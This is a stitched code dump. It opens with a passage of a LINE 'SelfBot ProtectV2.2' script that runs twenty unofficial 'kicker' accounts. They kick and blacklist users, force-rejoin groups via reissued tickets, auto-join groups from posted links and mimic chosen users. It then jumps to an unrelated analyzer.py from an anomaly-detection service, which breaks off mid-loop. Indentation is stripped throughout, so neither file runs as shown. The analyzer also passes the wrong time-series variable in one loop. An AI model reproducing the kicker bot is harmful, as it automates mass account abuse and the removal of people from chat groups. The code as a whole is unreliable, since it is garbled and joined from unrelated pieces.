kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
pass
return
if ga8 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker2.updateGroup(G)
Ticket = kicker2.reissueGroupTicket(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
pass
return
if ga9 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker3.updateGroup(G)
Ticket = kicker3.reissueGroupTicket(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
pass
return
if ga10 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
pass
return
#==============================================================================================================
#==============================================[OP TYPE 22 24 JOIN]============================================
#==============================================================================================================
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 25:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
cmd = command(text)
setKey = settings['setKey']['key'] if settings['setKey']['status'] else ''
if text in tmp_text:
return tmp_text.remove(text)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'เข้าร่วมกลุ่ม' + group.name)
try:
executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey)
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(talk_error))
time.sleep(3)
except Exception as error:
logError(error)
line.sendMessage(to, 'เกิดข้อผิดพลาด\n' + str(error))
time.sleep(3)
elif msg.contentType == 1: # Content type is image
if settings['changePictureProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/picture.jpg')
line.updateProfilePicture(path)
line.sendMessage(to, 'เปลี่ยนรูปโปรไฟล์เรียบร้อย')
settings['changePictureProfile'] = False
elif settings['changeCoverProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/cover.jpg')
line.updateProfileCover(path)
line.sendMessage(to, 'เปลี่ยนรูปปกเรียบร้อย')
settings['changeCoverProfile'] = False
elif to in settings['changeGroupPicture'] and msg.toType == 2:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/grouppicture.jpg')
line.updateGroupPicture(to, path)
line.sendMessage(to, 'เปลี่ยนรูปกลุ่มแล้ว')
settings['changeGroupPicture'].remove(to)
elif msg.contentType == 7: # Content type is sticker
if settings['checkSticker']:
res = '╭───「 Sticker Info 」'
res += '\n├ Sticker ID : ' + msg.contentMetadata['STKID']
res += '\n├ Sticker Packages ID : ' + msg.contentMetadata['STKPKGID']
res += '\n├ Sticker Version : ' + msg.contentMetadata['STKVER']
res += '\n├ Sticker Link : line://shop/detail/' + msg.contentMetadata['STKPKGID']
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 13: # Content type is contact
if settings['checkContact']:
mid = msg.contentMetadata['mid']
try:
contact = line.getContact(mid)
except:
return line.sendMessage(to, 'เกิดข้ผิดพลาดเฉียบพลัน ' + mid)
res = '╭───「 Details Contact 」'
res += '\n├ MID : ' + mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 16: # Content type is album/note
if settings['checkPost']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT', 'MH']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT']:
contact = line.getContact(sender)
author = contact.displayName
else:
author = msg.contentMetadata['serviceName']
posturl = msg.contentMetadata['postEndUrl']
res = '╭───「 Details Post 」'
res += '\n├ Creator : ' + author
res += '\n├ Post Link : ' + posturl
res += '\n╰───「SelfBot ProtectV2.2」'
elif op.type == 26:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
if settings['autoRead']:
kicker.sendChatChecked(to, msg_id)
kicker2.sendChatChecked(to, msg_id)
kicker3.sendChatChecked(to, msg_id)
kicker4.sendChatChecked(to, msg_id)
kicker5.sendChatChecked(to, msg_id)
kicker6.sendChatChecked(to, msg_id)
kicker7.sendChatChecked(to, msg_id)
kicker8.sendChatChecked(to, msg_id)
kicker9.sendChatChecked(to, msg_id)
kicker10.sendChatChecked(to, msg_id)
kicker11.sendChatChecked(to, msg_id)
kicker12.sendChatChecked(to, msg_id)
kicker13.sendChatChecked(to, msg_id)
kicker14.sendChatChecked(to, msg_id)
kicker15.sendChatChecked(to, msg_id)
kicker16.sendChatChecked(to, msg_id)
kicker17.sendChatChecked(to, msg_id)
kicker18.sendChatChecked(to, msg_id)
kicker19.sendChatChecked(to, msg_id)
kicker20.sendChatChecked(to, msg_id)
g1.sendChatChecked(to, msg_id)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'I\'m aleady on group ' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'Success join to group ' + group.name)
if settings['mimic']['status']:
if sender in settings['mimic']['target'] and settings['mimic']['target'][sender]:
try:
line.sendMessage(to, text, msg.contentMetadata)
tmp_text.append(text)
except:
pass
if settings['autoRespondMention']['status']:
if msg.toType in [1, 2] and 'MENTION' in msg.contentMetadata.keys() and sender != myMid and msg.contentType not in [6, 7, 9]:
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = [mention['M'] for mention in mentions['MENTIONEES']]
if myMid in mentionees:
if line.getProfile().displayName in text:
if '@!' not in settings['autoRespondMention']['message']:
line.sendMessage(to, settings['autoRespondMention']['message'])
else:
line.sendMentionV2(to, settings['autoRespondMention']['message'], [sender])
if settings['autoRespond']['status']:
if msg.toType == 0:
contact = line.getContact(sender)
if contact.attributes != 32 and 'MENTION' not in msg.contentMetadata.keys():
if '@!' not in settings['autoRespond']['message']:
line.sendMessage(to, settings['autoRespond']['message'])
else:
line.sendMentionV2(to, settings['autoRespond']['message'], [sender])
if op.type == 55:
if op.param1 in lurking:
if lurking[op.param1]['status'] and op.param2 not in lurking[op.param1]['members']:
lurking[op.param1]['members'].append(op.param2)
if lurking[op.param1]['reply']['status']:
if '@!' not in lurking[op.param1]['reply']['message']:
line.sendMessage(op.param1, lurking[op.param1]['reply']['message'])
else:
line.sendMentionV2(op.param1, lurking[op.param1]['reply']['message'], [op.param2])
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
except KeyboardInterrupt:
sys.exit('##---- KEYBOARD INTERRUPT -----##')
except Exception as error:
logError(error)
while True:
try:
ops = oepoll.singleTrace(count=80)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread1 = threading.Thread(target=executeOp, args=(op,))
thread1.daemon = True
thread1.start()
except Exception as e:
pass
|
analyzer.py
|
import logging
from Queue import Empty
from redis import StrictRedis
from time import time, sleep
from threading import Thread
from collections import defaultdict
from multiprocessing import Process, Manager, Queue
from msgpack import Unpacker, unpackb, packb
from os import path, kill, getpid, system
from math import ceil
import traceback
import operator
import socket
import settings
from alerters import trigger_alert
from algorithms import run_selected_algorithm
from algorithm_exceptions import *
from graphite import Graphite
logger = logging.getLogger("AnalyzerLog")
class Analyzer(Thread):
def __init__(self, parent_pid):
"""
Initialize the Analyzer
"""
super(Analyzer, self).__init__()
self.redis_conn = StrictRedis(host = settings.REDIS_HOST)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.anomalous_metrics = Manager().list()
self.exceptions_q = Queue()
self.anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def send_graphite_metric(self, name, value):
if settings.GRAPHITE_HOST != '':
sock = socket.socket()
sock.connect((settings.GRAPHITE_HOST.replace('http://', ''), settings.CARBON_PORT))
sock.sendall('%s %s %i\n' % (name, value, time()))
sock.close()
return True
return False
def spin_process(self, i, unique_metrics):
"""
Assign a bunch of metrics for a process to analyze.
"""
# Discover assigned metrics
keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
if i == settings.ANALYZER_PROCESSES:
assigned_max = len(unique_metrics)
else:
assigned_max = i * keys_per_processor
assigned_min = assigned_max - keys_per_processor
assigned_keys = range(assigned_min, assigned_max)
# Compile assigned metrics
assigned_metrics = [unique_metrics[index] for index in assigned_keys]
# Check if this process is unnecessary
if len(assigned_metrics) == 0:
return
# Multi get series
raw_assigned = self.redis_conn.mget(assigned_metrics)
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Distill timeseries strings into lists
for i, metric_name in enumerate(assigned_metrics):
self.check_if_parent_is_alive()
try:
raw_series = raw_assigned[i]
unpacker = Unpacker(use_list = False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)
# If it's anomalous, add it to list
if anomalous:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
metric = [datapoint, base_name]
self.anomalous_metrics.append(metric)
# Get the anomaly breakdown - who returned True?
for index, value in enumerate(ensemble):
if value:
algorithm = settings.ALGORITHMS[index]
anomaly_breakdown[algorithm] += 1
# It could have been deleted by the Roomba
except TypeError:
exceptions['DeletedByRoomba'] += 1
except TooShort:
exceptions['TooShort'] += 1
except Stale:
exceptions['Stale'] += 1
except Boring:
exceptions['Boring'] += 1
except:
exceptions['Other'] += 1
logger.info(traceback.format_exc())
for i, metric_name in enumerate(settings.AGGREGATED_METRIC):
g = Graphite(metric_name)
time_series = g.time_series("-24h")
try:
anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)
if anomalous:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
metric = [datapoint, base_name]
self.anomalous_metrics.append(metric)
# Get the anomaly breakdown - who returned True?
for index, value in enumerate(ensemble):
if value:
algorithm = settings.ALGORITHMS[index]
anomaly_breakdown[algorithm] += 1
except TooShort:
exceptions['TooShort'] += 1
except Stale:
exceptions['Stale'] += 1
except Boring:
exceptions['Boring'] += 1
except:
exceptions['Other'] += 1
logger.info(traceback.format_exc())
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.exceptions_q.put((key, value))
def run(self):
"""
Called when the process intializes.
"""
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
continue
# Discover unique metrics
unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
if len(unique_metrics) == 0:
logger.info('no metrics in redis. try adding some - see README')
sleep(10)
continue
# Spawn processes
pids = []
for i in range(1, settings.ANALYZER_PROCESSES + 1):
if i > len(unique_metrics):
logger.info('WARNING: skyline is set for more cores than needed.')
break
p = Process(target=self.spin_process, args=(i, unique_metrics))
pids.append(p)
p.start()
# Send wait signal to zombie processes
for p in pids:
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
